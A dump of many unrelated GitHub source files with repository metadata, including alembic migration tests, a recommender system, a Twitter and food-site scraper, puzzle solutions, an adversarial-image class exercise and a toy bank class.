# is cumbersome and might make the test unreadable - so the current revision stays unknown_revision.
unittest.mock.call(
mock_db_file_name, pathlib.Path(f"{Constants.unknown_revision}.db")
),
]
mock_shutil_copy.assert_has_calls(copy_calls)
@pytest.mark.parametrize("from_scratch", [True, False])
def test_database_exists_unknown_revision_failed_downgrade(
mock_alembic, mock_database, mock_shutil_copy, mock_db_file_name, from_scratch
):
mock_database(
current_revision=Constants.unknown_revision, db_backup_exists=False,
)
alembic_util = mlrun.api.utils.alembic.AlembicUtil(pathlib.Path(""))
with pytest.raises(
RuntimeError,
match=f"Cannot fall back to revision {Constants.latest_revision}, "
f"no back up exists. Current revision: {Constants.unknown_revision}",
):
alembic_util.init_alembic(from_scratch=from_scratch)
assert mock_alembic.stamp_calls == []
assert mock_alembic.upgrade_calls == []
mock_shutil_copy.assert_not_called()
@pytest.fixture()
def mock_database(
monkeypatch, mock_alembic, mock_db_file_name
) -> typing.Callable[[typing.List[str], str, bool, bool], None]:
def _mock_database(
revision_history: typing.List[str] = None,
current_revision: str = "",
db_file_exists: bool = True,
db_backup_exists: bool = True,
):
revision_history = revision_history or Constants.revision_history
def _db_file_exists(file_name: str) -> bool:
if file_name == mock_db_file_name:
return db_file_exists
else:
return db_backup_exists
monkeypatch.setattr(os.path, "isfile", _db_file_exists)
def _current_revision(alembic_config: typing.Any):
if current_revision != "" and current_revision not in revision_history:
raise Exception(
f"Can't locate revision identified by '{current_revision}'"
)
alembic_config.print_stdout(current_revision)
mock_alembic.current = _current_revision
def _revision_history(alembic_config: typing.Any):
for revision in revision_history:
alembic_config.print_stdout(f"none -> {revision}, revision name")
mock_alembic.history = _revision_history
return _mock_database
@pytest.fixture()
def mock_db_file_name(monkeypatch) -> str:
db_file_name = "test.db"
monkeypatch.setattr(mlconf.httpdb, "dsn", db_file_name)
return db_file_name
@pytest.fixture()
def mock_shutil_copy(monkeypatch) -> unittest.mock.Mock:
copy = unittest.mock.Mock()
monkeypatch.setattr(shutil, "copy2", copy)
return copy
class MockAlembicCommand(object):
def __init__(self):
self.stamp_calls = []
self.upgrade_calls = []
def stamp(self, alembic_config: typing.Any, revision: str):
self.stamp_calls.append(revision)
def upgrade(self, alembic_config: typing.Any, revision: str):
self.upgrade_calls.append(revision)
@pytest.fixture()
def mock_alembic(monkeypatch) -> MockAlembicCommand:
mocked_alembic_command = MockAlembicCommand()
monkeypatch.setattr(alembic, "command", mocked_alembic_command)
monkeypatch.setattr(alembic.config, "Config", unittest.mock.Mock())
return mocked_alembic_command
|
[
"noreply@github.com"
] |
joaovitor3.noreply@github.com
|
dd15e0124743808ae86ae4b6673293253dba1faa
|
a127d0feb3bcf4f2581f385bb24f2b789c771c9c
|
/10syo/95.py
|
aeb744b4427f8299c65072421e15fe33f65d4d91
|
[] |
no_license
|
NgoVanDau/nlp100knock
|
01383e4cc5a1470508744668103b9ea1a238b892
|
3ef63c0d2dfb55c0e6a31aced645f284325a98a5
|
refs/heads/master
| 2023-03-22T13:19:23.932429
| 2018-08-05T05:27:11
| 2018-08-05T05:27:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 788
|
py
|
# coding: utf-8
import numpy as np
fname_input = 'combined_out.tab'
with open(fname_input, 'rt') as data_file:
# 類似度の配列作成
human_score = []
my_score = []
N = 0
for line in data_file:
cols = line.split('\t')
human_score.append(float(cols[2]))
my_score.append(float(cols[3]))
N += 1
# ソート
human_index_sorted = np.argsort(human_score)
my_index_sorted = np.argsort(my_score)
# 順位の配列作成
human_order = [0] * N
my_order = [0] * N
for i in range(N):
human_order[human_index_sorted[i]] = i
my_order[my_index_sorted[i]] = i
# スピアマン相関係数算出
total = 0
for i in range(N):
total += pow(human_order[i] - my_order[i], 2)
result = 1 - (6 * total) / (pow(N, 3) - N)
print(result)
|
[
"kota.k.1132.pda@gmail.com"
] |
kota.k.1132.pda@gmail.com
|
6deb1c1dc2a5dc573a565342c04f98f906e1d989
|
9f9d699444208a203a0c666c87a64f675a6541e4
|
/Recommendations.py
|
5c764bfa33509543f355b356cbb73349306814eb
|
[] |
no_license
|
KiratiBhuva/Yelp-Recommendation-Analytics
|
ba231e6c1a4f993620abd51e731e1c5cced5225e
|
36991fef0aaf5b65cf52cf562e10da18a9ae773d
|
refs/heads/master
| 2020-04-07T06:59:04.242027
| 2018-11-17T22:56:45
| 2018-11-17T22:56:45
| 158,158,638
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,484
|
py
|
import numpy as np
import pandas as pd
import os
import sys
from surprise import BaselineOnly
from surprise import Dataset
from surprise import dataset
from surprise import Reader
from surprise.model_selection import cross_validate
from surprise import SVD
from surprise import accuracy
from surprise.model_selection import KFold
from surprise import KNNBasic
from surprise.model_selection import cross_validate, train_test_split
from time import time
from collections import defaultdict
import pickle
from BusinessInsights import TopRecommendation
class Recommendation_System:
def __init__(self):
tr = TopRecommendation()
self.reviewData,self.userData,self.restaurantData = tr.prepareData()
self.top_recs = defaultdict(list)
def prepare_data(self):
ldata = Dataset.load_from_df(self.reviewData[['user_id', 'business_id', 'stars']], Reader(rating_scale=(1, 5)))
return ldata
def build_model(self,data):
algo = SVD()
cross_validate(algo, data, measures=['RMSE', 'MAE'], cv=5)
return algo
def get_anti_testset(self, data):
data_train = data.build_full_trainset()
testset = data_train.build_anti_testset()
return testset
def store_predictions(self, testset,algo):
result = []
for row in testset:
result.append(algo.predict(row[0], row[1]))
return result
def get_recommendations(self, predictions, topN):
for uid, iid, r_ui, est, details in predictions:
self.top_recs[uid].append((iid, est))
for uid, user_ratings in self.top_recs.items():
user_ratings.sort(key=lambda x: x[1], reverse=True)
self.top_recs[uid] = user_ratings[:topN]
return self.top_recs
def get_recommendation_for_uid(self, user_id):
for uid, user_ratings in self.top_recs.items():
if (uid == user_id):
return uid, ([iid for (iid, _) in user_ratings])
return ''
if __name__ == '__main__':
rs = Recommendation_System()
data = rs.prepare_data()
print(len(data.df))
algo = rs.build_model(data)
test_set = rs.get_anti_testset(data)
start = time()
predictions = rs.store_predictions(test_set,algo)
end = time()
print((end - start )/60)
recommendations = rs.get_recommendations(predictions, 5)
pickle.dump(recommendations, open("model.pkl","wb"))
print("Model Dumped Successfully")
|
[
"nikhil.agrawal@sjsu.edu"
] |
nikhil.agrawal@sjsu.edu
|
e5ef3ebaa0969ae64b22fc95d380e2ab5550fc72
|
5e2c620ef66ecc72d67b6918a63743f8ecc8b5f3
|
/backend/app/db/mixins/eagerload.py
|
e8b5c511fca75d1310052947d5436140e997b4a0
|
[
"MIT"
] |
permissive
|
webclinic017/fastapi-admin-panel
|
00eda9d9f44346d59818aa76b363afe96ffb4be1
|
ba12ad16fe1fdd0f9ec2282b8aa9965bce858cda
|
refs/heads/main
| 2023-09-03T13:13:57.531141
| 2021-11-18T13:52:20
| 2021-11-18T13:52:20
| 482,085,378
| 1
| 0
|
MIT
| 2022-04-15T21:10:31
| 2022-04-15T21:10:30
| null |
UTF-8
|
Python
| false
| false
| 3,696
|
py
|
from sqlalchemy import select
from sqlalchemy.orm import joinedload, selectinload
from sqlalchemy.orm.attributes import InstrumentedAttribute
from sqlalchemy.sql import Select
from extra.types import Paths
JOINED = "joined"
SUBQUERY = "subquery"
def eager_expr(schema: dict) -> list:
flat_schema = _flatten_schema(schema)
return _eager_expr_from_flat_schema(flat_schema)
def _flatten_schema(schema: dict) -> dict:
def _flatten(schema: dict, parent_path: str, result: dict) -> None:
for path, value in schema.items():
# for supporting schemas like Product.user: {...},
# we transform, say, Product.user to 'user' string
if isinstance(path, InstrumentedAttribute):
path = path.key
if isinstance(value, tuple):
join_method, inner_schema = value[0], value[1]
elif isinstance(value, dict):
join_method, inner_schema = JOINED, value
else:
join_method, inner_schema = value, None
full_path = parent_path + "." + path if parent_path else path
result[full_path] = join_method
if inner_schema:
_flatten(inner_schema, full_path, result)
result = {}
_flatten(schema, "", result)
return result
def _eager_expr_from_flat_schema(flat_schema: dict) -> list:
result = []
for path, join_method in flat_schema.items():
if join_method == JOINED:
result.append(joinedload(path))
elif join_method == SUBQUERY:
result.append(selectinload(path))
else:
raise ValueError("Bad join method `{}` in `{}`".format(join_method, path))
return result
class EagerLoadMixin:
__abstract__ = True
@classmethod
def with_(cls, schema: dict) -> Select:
"""
Query class and eager load schema at once.
Example:
schema = {
'user': JOINED, # joinedload user
'comments': (SUBQUERY, { # load comments in separate query
'user': JOINED # but, in this separate query, join user
})
}
# the same schema using class properties:
schema = {
Post.user: JOINED,
Post.comments: (SUBQUERY, {
Comment.user: JOINED
})
}
await User.with_(schema).first(db)
"""
return select(cls).options(*eager_expr(schema or {}))
@classmethod
def with_joined(cls, *paths: Paths) -> Select:
"""
Eagerload for simple cases where we need to just
joined load some relations
In strings syntax, you can split relations with dot
due to this SQLAlchemy feature: https://goo.gl/yM2DLX
Example 1:
await Comment.with_joined('user', 'post', 'post.comments').first(db)
Example 2:
await Comment.with_joined(Comment.user, Comment.post).first(db)
"""
options = [joinedload(path) for path in paths]
return select(cls).options(*options)
@classmethod
def with_subquery(cls, *paths: Paths) -> Select:
"""
Eagerload for simple cases where we need to just
joined load some relations
In strings syntax, you can split relations with dot
(it's SQLAlchemy feature)
Example 1:
await User.with_subquery('posts', 'posts.comments').all(db)
Example 2:
await User.with_subquery(User.posts, User.comments).all(db)
"""
options = [selectinload(path) for path in paths]
return select(cls).options(*options)
|
[
"gsilents226@gmail.com"
] |
gsilents226@gmail.com
|
9fddd3021dd17be191feceb86765012109d7ceb3
|
edf8d011e3d4f30346b10adc6842efa5691fbcaa
|
/app/models/WfTaskHist.py
|
ff28484e9bae01e56745fdc4588c68ea8489e2a7
|
[] |
no_license
|
tianzhonghai/glaucus
|
fcdc06c93fdda078fb69f10620167d70cc9b6070
|
ef4d92b0cfb81b67c35c19f7d9d8cae4138d467b
|
refs/heads/master
| 2020-04-09T01:27:00.551806
| 2019-01-06T04:28:16
| 2019-01-06T04:28:16
| 159,904,766
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 995
|
py
|
from .. import db
class WfTaskHist(db.Model):
__tablename__ = 'wf_task_hist'
id = db.Column("id", db.Integer, primary_key=True, autoincrement=True)
deploy_id = db.Column("deploy_id", db.Integer, unique=False, nullable=False)
act_name = db.Column("act_name", db.String(45), unique=False, nullable=False)
act_type = db.Column("act_type", db.String(45), unique=False, nullable=False)
assignee_id = db.Column("assignee_id", db.Integer, unique=False, nullable=False)
assignee_account = db.Column("assignee_account", db.String(45), unique=False, nullable=False)
created_at = db.Column("created_at", db.DateTime, unique=False, nullable=False)
def __init__(self, deploy_id, act_name, act_type, assignee_id, assignee_account, created_at):
self.deploy_id = deploy_id
self.act_name = act_name
self.act_type = act_type
self.assignee_id = assignee_id
self.assignee_account = assignee_account
self.created_at = created_at
|
[
"tianzhh@fosun.com"
] |
tianzhh@fosun.com
|
0acef9c3808e7a5b7f9f88de92b9ba643d82dab7
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_157/699.py
|
b61de520301c8729931126c7dd1be5b969307475
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,002
|
py
|
T = int(raw_input().strip())
I, J, K = 2, 3, 4
def sign(x):
if x < 0:
return -1
else:
return 1
PROD = [
[1, I, J, K],
[I, -1, K, -J],
[J, -K, -1, I],
[K, J, -I, -1]]
def quat(a, b):
return PROD[a - 1][b - 1]
def translate(inp):
if inp == "i":
return I
elif inp == "j":
return J
else:
return K
for i in xrange(T):
L, X = map(int, raw_input().strip().split(' '))
lis = list(raw_input().strip())
lis = [translate(li) for li in lis]
lx = L * X
if lx < 3:
print "Case #%s: %s" % (i + 1, "NO")
continue
front = [1 for _ in xrange(lx)]
back = [1 for _ in xrange(lx)]
front[0] = lis[0]
back[-1] = lis[-1]
i_good, k_good = set(), set()
if front[0] == I:
i_good.add(0)
if back[-1] == K:
k_good.add(lx - 1)
for j in xrange(1, lx):
front[j] = sign(front[j - 1]) * quat(abs(front[j - 1]), lis[j % L])
if front[j] == I:
i_good.add(j)
for j in xrange(lx - 2, -1, -1):
back[j] = sign(back[j + 1]) * quat(lis[j % L], abs(back[j + 1]))
if back[j] == K:
k_good.add(j)
i_good = sorted(i_good)
il = len(i_good)
i_index = 0
k_good = sorted(k_good)
kl = len(k_good)
k_index = 0
if il == 0 or kl == 0:
print "Case #%s: %s" % (i + 1, "NO")
continue
while k_index < kl and i_good[i_index] + 1 >= k_good[k_index]:
k_index += 1
if k_index == kl:
print "Case #%s: %s" % (i + 1, "NO")
continue
found = False
while k_index < kl and i_index < il:
if back[i_good[i_index] + 1] == I:
found = True
break
i_index += 1
if i_index == il:
break
while k_index < kl and i_good[i_index] + 1 >= k_good[k_index]:
k_index += 1
if found:
print "Case #%s: %s" % (i + 1, "YES")
else:
print "Case #%s: %s" % (i + 1, "NO")
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
aa6cc554f58f5e5557ef4d3c1753c1802ff1d72e
|
67f38b82ff80ac3473457e0ec777a531847d9cfc
|
/crawlFirehose.py
|
b5d6df1a954915e93c9a26b0f7c444120f94de85
|
[] |
no_license
|
arapat/election-tweets-crawler
|
838b12cfaa96ef2c6b6b6f30dd39049c3e3af6ce
|
4f9aca7efa839f1d22071b456696ccbbdb9de361
|
refs/heads/master
| 2021-01-17T13:07:09.176992
| 2016-11-18T21:52:49
| 2016-11-18T21:52:49
| 39,797,792
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,835
|
py
|
import json
import os
import sys
from time import localtime, strftime, sleep
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
# Twitter API user credentials
vault = json.load(open("credentials.json"))
TWITTER_ACCESS_TOKEN = vault["TWITTER_ACCESS_TOKEN"]
TWITTER_TOKEN_SECRET = vault["TWITTER_TOKEN_SECRET"]
TWITTER_CONSUMER_KEY = vault["TWITTER_CONSUMER_KEY"]
TWITTER_CONSUMER_SECRET = vault["TWITTER_CONSUMER_SECRET"]
def show_message(message):
sys.stdout.write("[%s] " % strftime("%Y-%m-%d %H:%M:%S", localtime()))
sys.stdout.write(message + "\n")
sys.stdout.flush()
class StdOutListener(StreamListener):
def __init__(self):
self._420 = 0
self._okay_count = 0
def on_data(self, data):
print data
self._okay_count += 1
if self._okay_count >= 200:
self._420 = 0
return True
def on_error(self, status_code):
show_message("Error code: %d" % status_code)
if status_code == 420:
self._okay_count = 0
self._420 = self._420 + 1
show_message("Sleeping %d seconds before restart..." % (60 * self._420))
sleep(60 * self._420)
if __name__ == '__main__':
# Twitter authentication
auth = OAuthHandler(TWITTER_CONSUMER_KEY, TWITTER_CONSUMER_SECRET)
auth.set_access_token(TWITTER_ACCESS_TOKEN, TWITTER_TOKEN_SECRET)
listener = StdOutListener()
stream = Stream(auth, listener)
while True:
try:
show_message('(Re)start streaming...')
LOCATIONS = [-124.85, 24.39, -66.88, 49.38]
stream.filter(locations=LOCATIONS)
except Exception as e:
# Keep the crawler running without being interupted by exceptions
show_message("Exception: " + str(e))
|
[
"jalafate@gmail.com"
] |
jalafate@gmail.com
|
5a0bd582d2812e2f1ea919c2428e1a0975635904
|
31daf45a61c356f453d8a91a4272fe0ad21906cf
|
/clients/python/consumer.py
|
8ffa1a72bf8f0103fbbd576fec3881c99e2b62ae
|
[] |
no_license
|
pmdcosta/apache-kafka
|
ee6953a464f508d5c7ac186624064a535e7a22fd
|
a8750e1d7b0bebe76e36383ff6c3130ca5fb6569
|
refs/heads/master
| 2020-04-14T11:50:52.141601
| 2016-02-19T16:51:53
| 2016-02-19T16:51:53
| 51,597,726
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 525
|
py
|
from kafka import KafkaConsumer
# To consume latest messages and auto-commit offsets
consumer = KafkaConsumer(group_id='python_01', bootstrap_servers=['172.17.0.3:9092'])
consumer.subscribe(topics=['topic'])
try:
for message in consumer:
print("%s:%d:%d: key=%s value=%s" % (message.topic, message.partition,
message.offset, message.key,
message.value))
except KeyboardInterrupt:
consumer.close()
print("Closed")
|
[
"pmdcosta@outlook.com"
] |
pmdcosta@outlook.com
|
2e38374915f2ecbab48db2b63453ab8b8ee6cc16
|
f9459d1eb795f6778c043ac05890af86024fb65b
|
/Network_Visualization_and_Style_Transfer/visualizers/fooling_image.py
|
ad16a50dd938097758dbb3684304686f7fdc3d79
|
[] |
no_license
|
jiani556/Deep-Learning
|
a431591b04854121cc133e3545d2452a07d3b710
|
9463299e76ee200518e1448fdaf518339d773238
|
refs/heads/main
| 2023-09-06T03:53:15.472823
| 2021-11-24T16:00:22
| 2021-11-24T16:00:22
| 367,668,536
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,659
|
py
|
import torch
from torch.autograd import Variable
class FoolingImage:
def make_fooling_image(self, X, target_y, model):
"""
Generate a fooling image that is close to X, but that the model classifies
as target_y.
Inputs:
- X: Input image; Tensor of shape (1, 3, 224, 224)
- target_y: An integer in the range [0, 1000)
- model: A pretrained CNN
Returns:
- X_fooling: An image that is close to X, but that is classifed as target_y
by the model.
"""
model.eval()
# Initialize our fooling image to the input image, and wrap it in a Variable.
X_fooling = X.clone()
X_fooling_var = Variable(X_fooling, requires_grad=True)
# We will fix these parameters for everyone so that there will be
# comparable outputs
learning_rate = 10 # learning rate is 1
max_iter = 100 # maximum number of iterations
for it in range(max_iter):
# Forward
scores = model(X_fooling_var)
# check if fool the model
_, max_index = scores.data.max(dim=1)
if max_index[0] == target_y:
break
# Scores of target_y
target_score = scores[0, target_y]
# Backward
target_score.backward()
# Gradient
im_grad = X_fooling_var.grad.data
# update x with normalised gradient
X_fooling_var.data += learning_rate * (im_grad / im_grad.norm())
X_fooling_var.grad.data.zero_()
X_fooling = X_fooling_var.data
return X_fooling
|
[
"longjiani556@gmail.com"
] |
longjiani556@gmail.com
|
1dc881eb407851b67d23e4d50f686b37e45a39a4
|
9233da96e09317d423291d8bf8f1457ce75cfc8e
|
/2016/8/screen.py
|
657f3a4b019b55c2bfd0ef3005d7314ff58921e4
|
[] |
no_license
|
ryanfox/advent-of-code
|
bf6f2d220d29849dca2bda1ddd0813408dde6c3f
|
59836ca363e041f31ef933953b82a67f430d38fc
|
refs/heads/master
| 2020-04-09T03:33:18.975018
| 2018-12-03T17:56:23
| 2018-12-03T17:56:23
| 159,987,144
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,954
|
py
|
inputs = '''rect 1x1
rotate row y=0 by 10
rect 1x1
rotate row y=0 by 10
rect 1x1
rotate row y=0 by 5
rect 1x1
rotate row y=0 by 3
rect 2x1
rotate row y=0 by 4
rect 1x1
rotate row y=0 by 3
rect 1x1
rotate row y=0 by 2
rect 1x1
rotate row y=0 by 3
rect 2x1
rotate row y=0 by 2
rect 1x1
rotate row y=0 by 3
rect 2x1
rotate row y=0 by 5
rotate column x=0 by 1
rect 4x1
rotate row y=1 by 12
rotate row y=0 by 10
rotate column x=0 by 1
rect 9x1
rotate column x=7 by 1
rotate row y=1 by 3
rotate row y=0 by 2
rect 1x2
rotate row y=1 by 3
rotate row y=0 by 1
rect 1x3
rotate column x=35 by 1
rotate column x=5 by 2
rotate row y=2 by 5
rotate row y=1 by 5
rotate row y=0 by 2
rect 1x3
rotate row y=2 by 8
rotate row y=1 by 10
rotate row y=0 by 5
rotate column x=5 by 1
rotate column x=0 by 1
rect 6x1
rotate row y=2 by 7
rotate row y=0 by 5
rotate column x=0 by 1
rect 4x1
rotate column x=40 by 2
rotate row y=2 by 10
rotate row y=0 by 12
rotate column x=5 by 1
rotate column x=0 by 1
rect 9x1
rotate column x=43 by 1
rotate column x=40 by 2
rotate column x=38 by 1
rotate column x=15 by 1
rotate row y=3 by 35
rotate row y=2 by 35
rotate row y=1 by 32
rotate row y=0 by 40
rotate column x=32 by 1
rotate column x=29 by 1
rotate column x=27 by 1
rotate column x=25 by 1
rotate column x=23 by 2
rotate column x=22 by 1
rotate column x=21 by 3
rotate column x=20 by 1
rotate column x=18 by 3
rotate column x=17 by 1
rotate column x=15 by 1
rotate column x=14 by 1
rotate column x=12 by 1
rotate column x=11 by 3
rotate column x=10 by 1
rotate column x=9 by 1
rotate column x=8 by 2
rotate column x=7 by 1
rotate column x=4 by 1
rotate column x=3 by 1
rotate column x=2 by 1
rotate column x=0 by 1
rect 34x1
rotate column x=44 by 1
rotate column x=24 by 1
rotate column x=19 by 1
rotate row y=1 by 8
rotate row y=0 by 10
rotate column x=8 by 1
rotate column x=7 by 1
rotate column x=6 by 1
rotate column x=5 by 2
rotate column x=3 by 1
rotate column x=2 by 1
rotate column x=1 by 1
rotate column x=0 by 1
rect 9x1
rotate row y=0 by 40
rotate column x=43 by 1
rotate row y=4 by 10
rotate row y=3 by 10
rotate row y=2 by 5
rotate row y=1 by 10
rotate row y=0 by 15
rotate column x=7 by 2
rotate column x=6 by 3
rotate column x=5 by 2
rotate column x=3 by 2
rotate column x=2 by 4
rotate column x=0 by 2
rect 9x2
rotate row y=3 by 47
rotate row y=0 by 10
rotate column x=42 by 3
rotate column x=39 by 4
rotate column x=34 by 3
rotate column x=32 by 3
rotate column x=29 by 3
rotate column x=22 by 3
rotate column x=19 by 3
rotate column x=14 by 4
rotate column x=4 by 3
rotate row y=4 by 3
rotate row y=3 by 8
rotate row y=1 by 5
rotate column x=2 by 3
rotate column x=1 by 3
rotate column x=0 by 2
rect 3x2
rotate row y=4 by 8
rotate column x=45 by 1
rotate column x=40 by 5
rotate column x=26 by 3
rotate column x=25 by 5
rotate column x=15 by 5
rotate column x=10 by 5
rotate column x=7 by 5
rotate row y=5 by 35
rotate row y=4 by 42
rotate row y=2 by 5
rotate row y=1 by 20
rotate row y=0 by 45
rotate column x=48 by 5
rotate column x=47 by 5
rotate column x=46 by 5
rotate column x=43 by 5
rotate column x=41 by 5
rotate column x=38 by 5
rotate column x=37 by 5
rotate column x=36 by 5
rotate column x=33 by 1
rotate column x=32 by 5
rotate column x=31 by 5
rotate column x=30 by 1
rotate column x=28 by 5
rotate column x=27 by 5
rotate column x=26 by 5
rotate column x=23 by 1
rotate column x=22 by 5
rotate column x=21 by 5
rotate column x=20 by 1
rotate column x=17 by 5
rotate column x=16 by 5
rotate column x=13 by 1
rotate column x=12 by 3
rotate column x=7 by 5
rotate column x=6 by 5
rotate column x=3 by 1
rotate column x=2 by 3'''
def rotate(subject, distance):
return subject[-distance:] + subject[0:-distance]
def process_instruction(instruction, screen):
new_screen = [row[:] for row in screen]
parts = instruction.split()
if parts[0] == 'rect':
cols, rows = (int(component) for component in parts[1].split('x'))
for i in range(rows):
for j in range(cols):
new_screen[i][j] = 1
elif parts[0] == 'rotate':
coordinate = int(parts[2].split('=')[-1])
distance = int(parts[4])
if parts[1] == 'row':
new_screen[coordinate] = rotate(new_screen[coordinate], distance)
elif parts[1] == 'column':
unrotated = [row[coordinate] for row in new_screen]
rotated = rotate(unrotated, distance)
for i, value, in enumerate(rotated):
new_screen[i][coordinate] = value
else:
raise Exception
else:
raise Exception
return new_screen
instructions = inputs.splitlines()
screen = [[0] * 50] * 6
for instruction in instructions:
screen = process_instruction(instruction, screen)
print(sum(sum(row) for row in screen))
# part 2
for row in screen:
translated = ''.join(str(number) for number in row).replace('0', ' ').replace('1', '@')
print(translated)
|
[
"ryan@foxrow.com"
] |
ryan@foxrow.com
|
62ee5cf8e0858a9aefaa9d66f8e2f7626cf32e90
|
6289a4a15d51c9d12b94428617a148588097caee
|
/graph_convergence.py
|
fd97b10c9078a2ce71458bd6a385c9467f1c4675
|
[] |
no_license
|
david-franz/Genetic-Algorithm-Library
|
9f482213c021acd98018e1868016cb5463182a10
|
f7dd489ee7cd7fca2e1a495e2c4f4514756d7682
|
refs/heads/main
| 2023-07-18T19:09:23.958331
| 2021-09-05T17:08:16
| 2021-09-05T17:08:16
| 398,702,158
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 863
|
py
|
import math
import matplotlib.pyplot as plt
# this file graphs a list of lists, with each list representing the convergence data for each run of the algorithm
class GraphConvergence:
# this will be our data for the x-axis for each graph
# list of lists, representing the
# this can be come from constructor argument
# this will be our data for the y-axis for each graph
#best_fitnesses_for_each_gen_for_each_run = list()
def draw(self, title, best_fitnesses_for_each_gen_for_each_run):
runs = [run for run in range(len(best_fitnesses_for_each_gen_for_each_run))]
best_fitnesses_for_each_gen_for_each_run = [fitness for fitness in best_fitnesses_for_each_gen_for_each_run]
plt.plot(runs, best_fitnesses_for_each_gen_for_each_run)
plt.title(title)
plt.xlabel('gen #'), plt.ylabel('best fitness for gen') # naming the x and y axes
plt.show()
|
[
"davidfranznz@gmail.com"
] |
davidfranznz@gmail.com
|
9fbf373540f34ff54d25b2d079b04f1b9ec0d203
|
d4d69ddf357d385b14d95d8d1e91802d8ac1a165
|
/薄荷食物.py
|
2727dc2356f060d43e03e01e181f29b389957501
|
[] |
no_license
|
leediiaa/getall
|
78ffb096efc63ebe5538b75545a568add2256d6b
|
d0653767a1392581ef0d525e32b0094b3af7106c
|
refs/heads/master
| 2021-01-06T02:51:50.251741
| 2020-02-17T20:47:53
| 2020-02-17T20:47:53
| 241,205,034
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,883
|
py
|
#导入所需的库和模块:
from gevent import monkey
monkey.patch_all()
import gevent,requests, bs4, csv
from gevent.queue import Queue
work = Queue()
#创建队列对象,并赋值给work。
#前3个常见食物分类的前3页的食物记录的网址:
url_1 = 'http://www.boohee.com/food/group/{type}?page={page}'
for x in range(1, 4):
for y in range(1, 4):
real_url = url_1.format(type=x, page=y)
work.put_nowait(real_url)
#通过两个for循环,能设置分类的数字和页数的数字。
#然后,把构造好的网址用put_nowait添加进队列里。
#第11个常见食物分类的前3页的食物记录的网址:
url_2 = 'http://www.boohee.com/food/view_menu?page={page}'
for x in range(1,4):
real_url = url_2.format(page=x)
work.put_nowait(real_url)
#通过for循环,能设置第11个常见食物分类的食物的页数。
#然后,把构造好的网址用put_nowait添加进队
def crawler():
#定义crawler函数
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'
}
#添加请求头
while not work.empty():
#当队列不是空的时候,就执行下面的程序。
url = work.get_nowait()
#用get_nowait()方法从队列里把刚刚放入的网址提取出来。
res = requests.get(url, headers=headers)
#用requests.get获取网页源代码。
bs_res = bs4.BeautifulSoup(res.text, 'html.parser')
#用BeautifulSoup解析网页源代码。
foods = bs_res.find_all('li', class_='item clearfix')
#用find_all提取出<li class="item clearfix">标签的内容。
for food in foods:
#遍历foods
food_name = food.find_all('a')[1]['title']
#用find_all在<li class="item clearfix">标签下,提取出第2个<a>元素title属性的值,也就是食物名称。
food_url = 'http://www.boohee.com' + food.find_all('a')[1]['href']
#用find_all在<li class="item clearfix">标签下,提取出第2个<a>元素href属性的值,跟'http://www.boohee.com'组合在一起,就是食物详情页的链接。
food_calorie = food.find('p').text
#用find在<li class="item clearfix">标签下,提取<p>元素,再用text方法留下纯文本,就提取出了食物的热量。
print(food_name)
#打印食物的名称。
tasks_list = []
#创建空的任务列表
for x in range(5):
#相当于创建了5个爬虫
task = gevent.spawn(crawler)
#用gevent.spawn()函数创建执行crawler()函数的任务。
tasks_list.append(task)
#往任务列表添加任务。
gevent.joinall(tasks_list)
#用gevent.joinall方法,启动协程,执行任务列表里的所有任务,让爬虫开始爬取网站。
|
[
"cml13012272310@163.com"
] |
cml13012272310@163.com
|
f0ecedd383456b40b02ac7a4b0217dad0b0bdceb
|
90853c1856ef68dcae1d81dc9c294c5b7feaaf1d
|
/groger_saque.py
|
7fd204a699b7f68ed17569d730415db4046c0da9
|
[] |
no_license
|
hugoerico/aula14
|
64568597bb8cbc93220f1dabb27428325be8e272
|
816aea5be64db282570476e5b3389ca2c2af9ac8
|
refs/heads/master
| 2020-09-21T05:05:23.021271
| 2019-12-17T05:37:16
| 2019-12-17T05:37:16
| 224,687,704
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,538
|
py
|
class Banco:
def __init__(self,nome,idade,saldo):
self.nome=nome
self.idade=idade
self.saldo=saldo
def __str__(self):
return f"nome: {self.nome}, idade: {self.idade}, saldo:{self.saldo}"
def saque(self, valor):
self.valor = valor
if self.valor > self.saldo and self.valor > 1000:
return 'Saque negado'
else:
self.saldo -= self.valor
return f'aprovado. Saldo em conta: R${self.saldo}'
def deposito(self, valor):
self.valor = valor
if valor > 5000:
return 'Deposito negado'
else:
self.saldo += self.valor
return f' aprovado. Saldo em conta: R${self.saldo}'
def emprestimo(self, valor):
self.valor = valor
if self.idade < 21 and self.saldo > 1000 and self.valor < (self.saldo*15):
self.saldo += self.valor
return f' aprovado. Saldo em conta: R${self.saldo}'
pessoa = Banco(str(input('Nome completo: ')), int(input('Idade: ')), saldo=2000.00)
print('''Qual operação gostaria de realizar?:
1 Saque
2 Deposito
3 Emprestimo
Qualquer outro texto ou número Sair''')
usuario = input('digite sua opção: ')
if usuario == '1':
print(pessoa.saque(float(input('digite o valor do saque: R$'))))
elif usuario == '2':
print(pessoa.deposito(float(input('digite o valor do emprestimo: R$'))))
elif usuario == '3':
print(pessoa.emprestimo(float(input('digite o valor do emprestimo: R$'))))
else :
print('tchau')
|
[
"hugo.019@hotmail.com"
] |
hugo.019@hotmail.com
|
